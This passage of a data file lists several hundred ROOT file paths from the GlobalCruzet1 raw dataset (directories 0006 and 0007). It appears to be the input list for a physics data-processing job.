'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76B197DF-A61C-DD11-B053-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7851BF3D-981C-DD11-98DE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7871E4B3-B91C-DD11-9810-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78A51442-9A1C-DD11-82CE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78B68EE6-A61C-DD11-982C-000423D94A20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7AB72EDA-A61C-DD11-93AE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7C0BF6D7-B31C-DD11-A632-000423D9517C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7E311039-981C-DD11-8455-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80313A1F-B81C-DD11-BCAE-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80345FC4-A41C-DD11-AA4B-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8070C7DF-B71C-DD11-ADA3-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/822E46C5-A21C-DD11-92FE-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84267891-A01C-DD11-AC5E-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8482A33A-981C-DD11-BA59-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/848D9EC2-B91C-DD11-BD85-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84F6D348-9A1C-DD11-AC69-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84FD6FDF-A61C-DD11-9A4C-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/865955BE-A21C-DD11-8B6B-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B628BD-B91C-DD11-B16E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B85B3E-9A1C-DD11-8459-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86E278C3-B91C-DD11-9EBB-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A5F9D3D-9A1C-DD11-B194-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A8B30DD-A41C-DD11-A07F-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8AADB270-B31C-DD11-938C-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C25D448-9A1C-DD11-BAA5-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C52216F-B31C-DD11-82EA-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8CAD26DA-A61C-DD11-AE7E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E592FC0-B91C-DD11-A920-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E70E876-9C1C-DD11-84BE-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E896B1E-B81C-DD11-B712-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA513BB-A21C-DD11-97DE-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA8A0ED-A81C-DD11-A65A-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EB8255F-B11C-DD11-B3D7-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EF6EF7C-B31C-DD11-B02E-000423D98EC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904AB138-9A1C-DD11-B0C7-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904C3593-A01C-DD11-BCCC-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9066B967-9C1C-DD11-BB3B-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9067ACE6-A61C-DD11-B578-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/90823880-B11C-DD11-A6BF-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909250C9-A41C-DD11-8F66-000423D6B444.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909962C1-A21C-DD11-A255-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9262E0B9-A21C-DD11-BDED-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9272C5EB-A81C-DD11-88D5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9449765E-B11C-DD11-B99D-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94AE4A9E-B51C-DD11-A5FE-001617C3B76A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94C8DE6D-9C1C-DD11-98FE-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/965BD87C-B31C-DD11-BCB0-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/96613A1F-B81C-DD11-B8A8-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98315DBA-B91C-DD11-A70D-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9837D448-9A1C-DD11-99DC-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98577A34-981C-DD11-B699-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/987C6A38-981C-DD11-A3EB-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98F26DFE-A81C-DD11-B151-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9A9188C9-A41C-DD11-ADA5-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C33A87C-9C1C-DD11-9622-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C52E338-9A1C-DD11-BF41-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CBEB742-AF1C-DD11-91F0-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CC04B90-9E1C-DD11-B8DC-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9E8233A0-B51C-DD11-9222-001617DBD316.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A02EB8EA-A61C-DD11-A112-000423D99AA2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0A2198F-A01C-DD11-93EA-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E37787-B31C-DD11-8321-000423D94990.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E807CF-A41C-DD11-BB21-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A216CE55-AF1C-DD11-88F0-000423D98B28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A451701D-B81C-DD11-8258-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4586FA1-AB1C-DD11-BDF3-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4AD6A85-B31C-DD11-B9A7-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A6CA6BC4-A41C-DD11-A31B-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A87757E1-A61C-DD11-AF56-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A8E6BAB3-A21C-DD11-A4ED-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA174A3A-AF1C-DD11-BF8D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA1A101E-AD1C-DD11-A129-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AAA9E68F-9E1C-DD11-A380-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AC07D634-AF1C-DD11-8CDB-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/ACF22FB8-B91C-DD11-BA33-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AE39ADB2-B71C-DD11-B430-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AED27483-B31C-DD11-BAA1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B00336DD-A61C-DD11-8944-001617DBCF6A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B08F9CF7-A81C-DD11-90F4-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B0BFDCB7-B91C-DD11-AF2D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B20AE9D7-A41C-DD11-ABE8-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2382462-B11C-DD11-90FD-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B24F8173-B31C-DD11-835C-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2713B89-9E1C-DD11-B1B2-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B27A5B05-A91C-DD11-8492-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2BE5581-9E1C-DD11-AD50-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B400E66F-B31C-DD11-B0D7-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B649BBBA-A21C-DD11-9334-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B8FAEEAA-B71C-DD11-8B35-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BA0F0ED1-A61C-DD11-A33A-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BAE9B871-B31C-DD11-9BF0-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BC6B566C-9C1C-DD11-8154-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BCDBE12A-AB1C-DD11-AD5F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BE3A3B3D-981C-DD11-9A57-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BEEE307D-B31C-DD11-A4F8-000423D99AAA.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C014F777-B11C-DD11-B9DD-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FB9896-A01C-DD11-977A-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FDA089-9E1C-DD11-A3F0-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C23AF9D7-A41C-DD11-BA77-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C2CC26A6-B71C-DD11-89F4-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C4EEE3B3-B91C-DD11-85E5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C62A647C-9C1C-DD11-9136-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6708081-9E1C-DD11-8334-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6CF99B9-A21C-DD11-9D70-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C8086ACA-A41C-DD11-ABC6-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCB28CBF-A21C-DD11-A343-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCF1CF38-981C-DD11-B954-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CED1AE20-B81C-DD11-937A-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEE72F02-A91C-DD11-B45D-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEFC3E91-A01C-DD11-98CC-001617E30D0A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2885E89-9E1C-DD11-A1E6-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2B84A78-B61C-DD11-A238-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D42B50C4-A41C-DD11-BFB7-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D44B06B4-A21C-DD11-907F-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D464867B-9C1C-DD11-8980-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D4EBE6BA-A21C-DD11-B8A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D63FD683-9E1C-DD11-81FA-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D67A46C5-A21C-DD11-AE60-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6A13F4E-9A1C-DD11-A008-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6D813A1-A01C-DD11-A609-0019DB2F3F9B.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D814E871-B31C-DD11-9C71-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D83944BB-A21C-DD11-8862-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8469596-A01C-DD11-83F0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D86B334D-9A1C-DD11-B5DE-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8BB5636-981C-DD11-A230-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8E05E70-B31C-DD11-A757-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA16873D-9A1C-DD11-AE70-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA4142AD-B71C-DD11-9DAA-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAA952E9-B71C-DD11-815B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAC801D4-A41C-DD11-859E-000423D6B2D8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC0E836F-B31C-DD11-8C0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6A381B-AB1C-DD11-A583-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6BFCA3-B71C-DD11-A650-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC8E3F3D-9A1C-DD11-9FE1-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DE98753B-AF1C-DD11-A990-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E0EC4FE6-A61C-DD11-9AC0-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E210BBAD-B71C-DD11-9B75-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E4C16FD4-A61C-DD11-BCFE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E66F0446-AF1C-DD11-95F1-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E690BA1F-B81C-DD11-8302-001617C3B6DE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8002A9C-A01C-DD11-B643-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89041EC-A81C-DD11-9B7B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89EDDD2-A41C-DD11-A22C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8CFAD3D-981C-DD11-B22A-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EA2B3732-AD1C-DD11-9725-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAA9076D-9C1C-DD11-82A1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAACE083-B31C-DD11-88A3-000423D8F63C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EACE846B-9C1C-DD11-8AE5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAD127D4-A61C-DD11-A7F5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAED757C-9E1C-DD11-9717-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC1807DE-A61C-DD11-8881-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC3D0181-9E1C-DD11-B761-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC455A18-AB1C-DD11-8DDD-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC48C57A-9E1C-DD11-8E79-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FAF34-981C-DD11-8D58-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FF989-9E1C-DD11-B8B5-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F068CE9B-A01C-DD11-A90A-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F246A9A6-B71C-DD11-803B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F25A5A88-B11C-DD11-B4F2-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F274EE67-9C1C-DD11-A92E-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2D83EA9-B51C-DD11-89D5-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2DA1660-B11C-DD11-B258-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2E50819-AB1C-DD11-BB10-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F4039A71-9C1C-DD11-B3A2-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F899D8B7-B91C-DD11-9133-001617DBD540.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FAC2EFD0-A41C-DD11-A9D4-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FC879E74-B31C-DD11-B356-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA0CCC5-A21C-DD11-BE49-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA982D5-A61C-DD11-8A1F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCB68476-9C1C-DD11-B496-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCD38880-9E1C-DD11-829C-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE098EF7-A81C-DD11-A0AE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE134BB4-A21C-DD11-BDCC-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/000CD59C-CC1C-DD11-A498-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0095DE1B-C01C-DD11-975B-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/00D397C3-D01C-DD11-AAD7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0227DE52-C81C-DD11-910C-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/023E384A-C41C-DD11-B179-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/02A0A458-C41C-DD11-BDAE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0472A1D8-D21C-DD11-8A1F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0484A412-C01C-DD11-845D-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/060B4FA8-CE1C-DD11-9550-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/062E02B4-CE1C-DD11-9E2C-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/063C069C-CA1C-DD11-A395-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0664041F-C21C-DD11-A89C-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06DB5CC3-D01C-DD11-91CC-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06F29FCD-D01C-DD11-BC90-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/08FAD35A-C41C-DD11-AE05-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0AF3CEE5-BB1C-DD11-8E38-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C49504A-C41C-DD11-B41E-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C50A1D6-D01C-DD11-818F-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0CA1115F-C81C-DD11-BFC9-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E054203-C01C-DD11-AA43-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E14B5D2-B91C-DD11-8468-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/102F803D-C61C-DD11-9B28-000423D6CA72.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/108485A3-CE1C-DD11-B4E6-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10A6495F-C81C-DD11-9BAA-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10E92BE2-BB1C-DD11-9356-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/121C2B53-C61C-DD11-B128-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12B2969B-CC1C-DD11-AE14-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12D4A753-C81C-DD11-ACAA-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1459D199-CC1C-DD11-912B-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/14F7031F-C21C-DD11-84F6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/162C5398-CC1C-DD11-A72D-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/164BFF8D-CA1C-DD11-8932-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16937EE7-CC1C-DD11-B23B-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1695C71C-C01C-DD11-866E-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16D4ED53-C41C-DD11-8A8B-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16E75A61-C81C-DD11-8F7D-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181236C7-B91C-DD11-9101-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181B7712-C01C-DD11-A511-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/184F93F8-BB1C-DD11-843D-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/185F0E9E-CC1C-DD11-B1B4-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/186F2D03-C01C-DD11-9860-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18AC3F95-CA1C-DD11-8B7A-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18F04319-C21C-DD11-B16C-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1A3A8508-BE1C-DD11-AE08-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1AFB7BBB-D01C-DD11-8B27-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C006011-C21C-DD11-A5C9-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C2B095F-C81C-DD11-AA1F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C307446-C61C-DD11-850B-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C87B154-C41C-DD11-ABBA-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1EA987EF-BB1C-DD11-A499-000423D98FBC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1ED2084F-C61C-DD11-A76D-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2043E634-C21C-DD11-85CD-001617DBCF1E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/205468CD-D21C-DD11-8B1A-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2071A802-BE1C-DD11-B1E0-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220ABE65-C81C-DD11-9DF4-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220CC9F1-BB1C-DD11-9CC0-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/222FFF23-C21C-DD11-9C92-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/227EA1AD-CE1C-DD11-8133-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/229C872E-C21C-DD11-B263-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2403325F-C41C-DD11-887E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2606130A-C01C-DD11-9BA6-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26A522E2-BB1C-DD11-8605-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26AF8BF4-BD1C-DD11-92C0-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26F014F5-BB1C-DD11-9CDD-000423D33970.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/284795FB-BD1C-DD11-8134-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/28DAA6E5-BB1C-DD11-9497-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A629202-C01C-DD11-99AF-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A684F12-C01C-DD11-B52A-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2AC81D1E-C21C-DD11-9E3D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C06BFCE-D01C-DD11-ACBC-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C879CDF-BB1C-DD11-98B6-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2E5A7CD5-BB1C-DD11-8024-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EC3BB1E-C01C-DD11-B657-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFC81C8-D01C-DD11-BC93-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFCB33C-C61C-DD11-9BDE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30085D93-CC1C-DD11-95BF-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/300A34D7-B91C-DD11-B8B8-001617E30CE8.root',
